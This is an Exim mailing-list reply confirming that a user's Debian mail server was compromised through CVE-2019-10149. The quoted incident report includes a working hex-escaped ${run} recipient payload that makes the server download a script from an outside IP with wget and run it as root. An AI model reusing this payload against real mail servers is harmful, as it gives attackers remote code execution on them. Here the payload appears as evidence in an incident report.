Author: Marius Schwarz Date: To: Calum Mackay, Calum Mackay via Exim-users, exim-users Subject: Re: [exim] just been hacked, could be CVE-2019-10149?
You got it.
Why didn't you harden your exim with the "allowed chars" change we posted here on the list, or did you?
Am 11. Juni 2019 02:10:40 MESZ schrieb Calum Mackay via Exim-users <exim-users@???>: >hi all,
>
>My mail system has just been hacked; it's running Debian unstable exim
>4.91-9
>
>Could it be CVE-2019-10149? I don't see any reports of active exploits
>yet.
>
>The reasons I suspect exim involvement:
>
>• starting today, every 5 mins getting frozen messages:
>
>The following address(es) have yet to be delivered:
>
>root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
>
>Too many "Received" headers - suspected mail loop
>
>• the trojan horse scripts, that were successfully installed on my
>system, with root access, are all group Debian-exim
>
>
>Luckily, it looks like the trojans did nothing more than repeated
>attempts to open up my ssh server to root logins, which I think (and
>hope) didn't actually work, so I may have been lucky, and the damage
>isn't widespread.
>
>
>ought I to be reporting this anywhere?
>
>
>thanks,
>calum.
>
>--
>## List details at https://lists.exim.org/mailman/listinfo/exim-users >## Exim details at http://www.exim.org/ >## Please use the Wiki with this list - http://wiki.exim.org/
--
Diese Nachricht wurde von meinem Android-Gerät mit K-9 Mail gesendet.
